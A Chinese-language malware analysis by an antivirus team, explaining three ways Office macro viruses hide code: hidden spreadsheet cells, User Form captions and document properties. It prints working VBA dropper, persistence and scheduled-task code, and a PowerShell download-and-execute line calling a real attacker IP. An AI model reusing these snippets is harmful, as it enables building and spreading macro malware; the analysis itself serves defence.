技術揭秘:宏病毒程式碼三大隱身術
0x00 簡介
作為一類古老的病毒,宏病毒隨著勒索軟體的興起而捲土重來。尤其是在2016年,以Locky為代表的勒索軟體利用Office宏肆虐傳播,宏病毒也成為目前最活躍的病毒品種之一。
在與安全軟體的對抗中,宏病毒使用了多種手段隱藏其惡意程式碼或資料,近期出現的新變種則是利用Excel表格的函式動態生成PE檔案資料、設定遠距離存放位置、隱藏顯示、不同表切換等方式進行隱藏。接下來,360QEX引擎團隊將對宏病毒程式碼流行的三類“隱身術”進行逐一揭秘。
0x01 Excel表格隱藏資料
- 樣本檔案md5: 48f202f903741e7a1722bfa6b4c051aa.xls
- sha256: 083a05000c4b8e9a88a0ff8a95a3d9826dd389b440bb1781237ca124b0d986a7
virustotal 掃描結果:
樣本對自身 VBAProject 進行了加密,
破解之後,看到了宏程式碼執行入口函式 Auto_Open,
#!vb
Sub Auto_Open()
On Error Resume Next
Application.DisplayAlerts = False
Dim WB As Workbook
Set WB = ActiveWorkbook
Dim Sh1, Sh2, sh3 As Worksheet
Set Sh1 = WB.Sheets(1)
Set Sh2 = WB.Sheets(2)
Set sh3 = WB.Sheets(3)
Dim str As String
str = Sh2.Cells(996, 40)
Dim t As Date
t = Now + TimeSerial(0, 0, 1)
Application.OnTime t, str
End Sub
病毒作者使用 Application.OnTime 函式,間隔 1 秒,執行 字串 “str” ,”str” 的值是從表格 Cells(996, 40) 中獲取,當去檢視錶格中該處值時發現病毒更改了Excel單元格格式 ,把資料隱藏顯示。
單元格格式設定為三個 ;;; 時,單元格內容就會被隱藏。
單元格的格式預設是顯示的,初始設定為,
去掉隱藏後,檢視錶格中該值是 Fnslr12 , 即病毒的功能入口函式名稱,函式程式碼為,
#!vb
Sub Fnslr12()
On Error Resume Next
Application.DisplayAlerts = False
Call Build
Sheets(1).Select
Dim WB As Workbook
Set WB = ActiveWorkbook
Dim Sh1, Sh2, sh3 As Worksheet
Set Sh1 = WB.Sheets(1)
Set Sh2 = WB.Sheets(2)
If Cells(2, 1) <> "" Then
GoTo skyhigh
End If
''' 以下省略
因此,該函式為病毒程式碼的主功能函式。
此函式的功能有,
1、Call Build
呼叫 Build 函式, Build 函式功能為:在表格中動態生成,待寫入 可執行檔案(pe檔案)所需的資料,其功能程式碼簡略如下,
#!vb
Sub Build()
Sheets(2).Select
Set WB = ActiveWorkbook
Set Sh1 = WB.Sheets(1)
Set Sh2 = WB.Sheets(2)
'bob location
i = Sh2.Cells(1000, 12)
j = Sh2.Cells(1000, 13)
'index table location
R = Sh2.Cells(1000, 10)
C = Sh2.Cells(1000, 11)
Counter = R
Do While Sh2.Cells(Counter, C) <> ""
If Sh2.Cells(Counter, C + 1) <> "" Then
S1 = Sh2.Cells(Counter, C)
S2 = Sh2.Cells(Counter, C + 1)
End If
Counter = Counter + 1
Loop
Cells(i, j).Select
Range(Selection, Selection.End(xlDown)).Select
Selection.Cut
Range("i1001").Select
ActiveSheet.Paste
Cells(1, 1).Select
End Sub
函式執行結果為,在 1001 行往下,依次每行填入資料。
2、對是否執行過一次做檢查
#!vb
If Cells(2, 1) <> "" Then
GoTo skyhigh
End If
當執行過一次之後, Cells(2,1) 表格會被寫入值,會在這裡進入語句 Then ,執行 “Goto skyhigh” 語句, “skyhigh” 標記定位在函式尾部,即執行該語句後會退出該函式。
3
從程式碼意圖猜測,病毒作者想在 %userprofile% AppDataRoamingMicrosoftTemplates 生成一個名為Macro1.vbs 的vbs檔案 ,
#!vb
Dim Fnslr1 As String
Dim Fnslr2 As String
Fnslr2 = Environ(Sh2.Cells(998, 40)) & "AppDataRoamingMicrosoftTemplatesMacro1.vbs"
ChDrive (Fnslr2)
If Dir(Fnslr2) = "" Then
Else
End If
其中,病毒拼湊生成檔案的目錄路徑時,從表格 2 的Cells(998, 40) 中讀取 ,該值為環境變數值 userprofile.
只是,病毒作者並沒有繼續完善相關程式碼。實際測試執行樣本也並沒有生成該檔案,猜測可能作者後續加入該功能,或者該功能已經被取消。
4
在 %serprofile% AppDataRoamingMicrosoftTemplates 目錄生成可執行檔案 Macro1.exe,
#!vb
Dim i As Double
i = 1000
Fnslr1 = "Macro1.exe"
Fnslr2 = Environ(Sh2.Cells(998, 40)) & "AppDataRoamingMicrosoftTemplates"
Fnslr3 = FreeFile()
Open Fnslr1 For Binary As Fnslr3
Do While Sh2.Cells(i, 9) <> ""
Fnslr11 = Sh2.Cells(i, 9)
If (Fnslr9 = True) Then
Fnslr8 = 1
Do While (Fnslr8 < Len(Fnslr11))
Fnslr6 = Sh2.Cells(997, 40) & Mid(Fnslr11, Fnslr8, 3)
Put #Fnslr3, , Fnslr6
Fnslr8 = Fnslr8 + 3
Loop
End If
If Fnslr9 = False Then
Fnslr9 = True
End If
i = i + 1
Loop
Close #Fnslr3
Dim Fnslr10 As String
Fnslr10 = Fnslr1
Fnslr7 = Shell(Fnslr10, vbHide)
Dim i As Double
i = 1000
Fnslr1 = "Macro1.exe"
Fnslr2 = Environ(Sh2.Cells(998, 40)) & "AppDataRoamingMicrosoftTemplates"
Fnslr3 = FreeFile()
Open Fnslr1 For Binary As Fnslr3
Do While Sh2.Cells(i, 9) <> ""
Fnslr11 = Sh2.Cells(i, 9)
If (Fnslr9 = True) Then
Fnslr8 = 1
Do While (Fnslr8 < Len(Fnslr11))
Fnslr6 = Sh2.Cells(997, 40) & Mid(Fnslr11, Fnslr8, 3)
Put #Fnslr3, , Fnslr6
Fnslr8 = Fnslr8 + 3
Loop
End If
If Fnslr9 = False Then
Fnslr9 = True
End If
i = i + 1
Loop
Close #Fnslr3
Dim Fnslr10 As String
Fnslr10 = Fnslr1
Fnslr7 = Shell(Fnslr10, vbHide)
寫入 Macro1.exe 所需的資料,從 Excel 表格中 Cells(997, 40) 周圍讀取,實際測試資料開始位置是 1001行,
程式碼尾部使用 Shell 函式,啟動生成的 Macro1.exe 。
檔案資訊
可執行檔案是 x64位的,功能是,啟動 powershell 附帶 –enc 引數,執行一段 shellcode ,這段 shellcode是一個 reverse shell ,連線駭客伺服器,等待下達命令。
此部分與下面建立計劃任務不間斷執行的功能呼應起來,此部分不是本文重點,不再詳述。
5、
在 %serprofile% AppDataRoamingMicrosoftTemplates 目錄生成 bat (cmd) 批處理指令碼檔案 Macro1.bat,
#!vb
Fnslr2 = Environ(Sh2.Cells(998, 40)) & "AppDataRoamingMicrosoftTemplates"
Dim User As String
User = Environ(Sh2.Cells(998, 40))
Fname = Fnslr2 & "Macro1.bat"
FNum = FreeFile
Open Fname For Output Access Write As #FNum
WholeLine = "SchTasks /Create /SC HOURLY /TN " & Sh2.Cells(1000, 3) & "Macro1" & Sh2.Cells(1000, 3) & " /TR" & " " & User & "AppDataRoamingMicrosoftTemplates" & "Macro1.exe /ST 01:00"
Print #FNum, WholeLine
Close #FNum
Dim TempFileName As String
TempFileName = Fnslr2 & "Macro1.bat"
Shell TempFileName, vbHide
尾部使用 Shell 函式 啟動該指令碼,結果是在使用者機器建立了一個計劃任務, 每隔一小時執行一次 上面生成的 Macro1.exe 。
6、彈窗顯示輸入密碼才能繼續進行執行
#!vb
pword = InputBox("Please enter a password to proceed", "Password Required", "*******")
Select Case pword
Case Is = ""
MsgBox "Try Again"
Case "Alon2016"
RP = 1
Case Is <> "Alon2016"
MsgBox "Try Again"
End Select
從病毒程式碼中知道,要求輸入的密碼是 “Alon2016” 。
7、
接下來是現場清理和掩飾,刪除呼叫Build 函式在表格生成的資料,在表格的開頭顯著位置填入在其他表格中儲存的郵件收件人地址資訊,
小結:該樣本的特別之處有:
- PE檔案資料是使用函式動態生成
- 資料存放在Excel表格中,使用隱藏顯示
- 資料存放位置很遠,不容易被看到
- 病毒在不同的excel表中切換,給分析人員除錯VBA程式碼增加困難
- 病毒執行完畢,清理現場,顯示郵件地址列表,掩飾自身
0x02 VBA User Form隱藏程式碼
此類病毒把部分程式碼隱藏到 VBA 工程中的 使用者控制元件(User Form)中,甚至把帶有程式碼的控制元件最小化,使之不易被看到。
- 樣本檔案md5:9266db6c7772f6c45411ff3a591b1374
- sha256 : 9d11f2d2f0e0e5fd8a2ef552a5521920767d7939881443435296d0c600e4a71a
virustotal 掃描結果:
檢視該檔案的宏,
此檔案看起來像是正常的SQL操作類的宏程式碼,但是當我們檢視窗體 Ultra 時發現,
有個控制元件的Caption中存放了可疑資料如下,
#!bash
D!icrobrioft.XD!LHTTP10)Adodb.britr00aD!10)brih00ll.Application10)Wbricript.brih00ll10)Proc00bribri10)G00T10)T00D!P10)Typ0010)op00n10)writ0010)r00briponbri00Body10)briav00tofil0010)hendib00.00x00
此資料在宏程式碼中被使用的位置為,
#!vb
CadenaCurrency(Ultra.CommandButton3.Caption, "00", "e")
其中,CadenaCurrency 是一個簡單的 Replace 呼叫,
#!vb
Public Function CadenaCurrency(A1 As String, A2 As String, A3 As String) As String
CadenaCurrency = Replace(A1, A2, A3)
End Function
解密方法是,
#!vb
Dim aproblems As String
aproblems = CadenaCurrency(Ultra.CommandButton3.Caption, "00", "e")
aproblems = CadenaCurrency(aproblems, "D!", "M")
aproblems = CadenaCurrency(aproblems, "bri", "s")
constans_problems = Split(aproblems, "10)")
解密為,
#!bash
Microsoft.XMLHTTP
Adodb.stream
shell.Application
Wscript.shell
Process
GeT
Temp
Type
open
write
responseBody
savetofile
hendibe.exe
幾個字串呈現出非常明顯的意圖,下載(Microsoft.XMLHTTP)+ 寫檔案(Adodb.stream)+ 執行(shell.Application / Wscript.shell)。
此樣本因為程式碼有問題,沒能成功執行起來。找到宏程式碼中使用 Microsoft.XMLHTTP 物件下載檔案的位置,加上斷點除錯,起先因為作者疏忽,忘記書寫一個雙引號,導致編譯失敗,
之後,執行到下載檔案處時,出現了報錯。
0x03 文件內建屬性隱藏程式碼
此類病毒把程式碼核心惡意部分放入文件的內建屬性中。
- 樣本檔案md5:0ce81eda6b6886163cf5dadffecc0df9
- sha256: 23d07a51f7a14a95a1efc55ad3f18cd5a71607156cd325256d43f0b68cfb62cd
virustotal 掃描結果:
此樣本的vba 宏程式碼只有1個檔案,很簡短,
#!vb
Attribute VB_Name = "NewMacros"
Sub Auto_Open()
Call winshell
End Sub
Sub AutoOpen()
Call winshell
End Sub
Function winshell() As Object
On Error Resume Next
Err.Clear
Dim ps As String
ps = ActiveDocument.BuiltInDocumentProperties("Manager").Value
Dim Obj As Object
Set Obj = CreateObject("WScript.Shell")
Obj.Run ps, 0
Application.DisplayAlerts = False
End Function
響應兩個文件開啟事件,AutoOpen 與Auto_Open,直接執行 winshell函式, winshell函式讀取檔案內建屬性,Manager 的值,直接執行起來。Manager值,我們使用右鍵檔案屬性,檢視為,
#!powershell
powershell.exe -nop -w hidden -c $b=new-object net.webclient;$b.proxy=[Net.WebRequest]::GetSystemWebProxy();$b.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $b.downloadstring('http://37.28.154.204:8081/ygklKbyIVG51Kol');
是一段 Powershell 執行的指令碼程式碼,從指定 URL (http://37.28.154.204:8081/ygklKbyIVG51Kol) 下載檔案。目前測試此URL已經無法訪問。
0x04 總結
以加密勒索為代表的病毒,越來越多的使用Office宏,js,vbs等非Pe檔案來傳播。透過指令碼程式碼動態向Windows 目錄中釋放可執行檔案或者從伺服器下載可執行檔案。
非PE病毒查殺引擎QEX是 360安全產品中負責查殺宏病毒及vbs、js、html等指令碼病毒的獨有引擎。上述樣本QEX引擎均已查殺。
在這裡也提醒 Microsoft Office 文件系列軟體的使用使用者,
如日常無使用宏的需求,請禁用 Office 宏,禁用方式參考
對於經常使用宏工作的使用者,請安裝安全軟體,定期更新病毒庫,對於他人傳送的文件,在開啟之前請先掃描。
0x05 Reference
- https://blogs.technet.microsoft.com/mmpc/2016/05/17/malicious-macro-using-a-sneaky-new-trick/
- http://www.freebuf.com/articles/system/104221.html
- https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html
- http://superuser.com/questions/807926/how-to-bypass-the-vba-project-password-from-excel
- https://support.office.com/zh-cn/article/%E5%90%AF%E7%94%A8%E6%88%96%E7%A6%81%E7%94%A8-Office-%E6%96%87%E6%A1%A3%E4%B8%AD%E7%9A%84%E5%AE%8F-7b4fdd2e-174f-47e2-9611-9efe4f860b12
- http://bobao.360.cn/learning/detail/2827.html
相關文章
- Vue 3 技術揭秘Vue
- 駭客攻擊技術之高階SQL隱碼攻擊技術(轉)SQL
- XP的DEP防毒技術揭秘(轉)防毒
- 資料隱藏技術資料隱藏
- 技術沙龍|京東雲端到端多媒體關鍵技術揭秘
- 淺談程序隱藏技術
- 隱私計算核心技術
- OpenAI Sora 關鍵技術詳解:揭秘時空碎片 (Spacetime Patches) 技術OpenAISora
- MaxCompute執行引擎核心技術DAG揭秘
- 區塊鏈技術中隱私計算的技術特點區塊鏈
- ProGuard程式碼混淆技術詳解
- 保護C#程式碼的藝術:深入淺出程式碼混淆技術C#
- 微信「看一看」 推薦排序技術揭秘排序
- 密碼技術密碼
- 程式碼規範技術交流提綱
- SET智慧合約量化(策略)系統開發技術(成熟技術程式碼)
- 微信如何直接跳轉外部瀏覽器技術揭秘瀏覽器
- 微服務治理熱門技術揭秘:無損上線微服務
- DES演算法揭秘:資料加密的前沿技術演算法加密
- 前端核心程式碼保護技術面面觀前端
- 低程式碼的技術原理是什麼?
- 被黑客們使用的程式碼混淆技術黑客
- 我該如何向非技術人解釋SQL隱碼攻擊?SQL
- COM 程式注入技術
- 如何用 AI 技術保護隱私安全?AI
- 隱私計算相關技術介紹
- javascript動態隱藏顯示技術(轉)JavaScript
- 微信域名檢測、防封,微信跳轉技術揭秘(一)
- 微信域名檢測、防封,微信跳轉技術揭秘(二)
- 滴滴全民拼車日背後的運維技術揭秘運維
- 億級流量高併發春晚互動前端技術揭秘前端
- Cube 技術解讀 | Cube 小程式技術詳解
- 程式人生:做技術,切不可沉湎於技術
- Windows2003 核心級程式隱藏、偵測技術Windows
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-SQL隱碼攻擊技術-語句注入SQL
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-SQL隱碼攻擊技術-語句修改SQL
- 量化合約原始碼開發技術/合約量化系統開發技術原始碼搭建程式原始碼
- Deco 智慧程式碼技術揭祕:設計稿智慧生成程式碼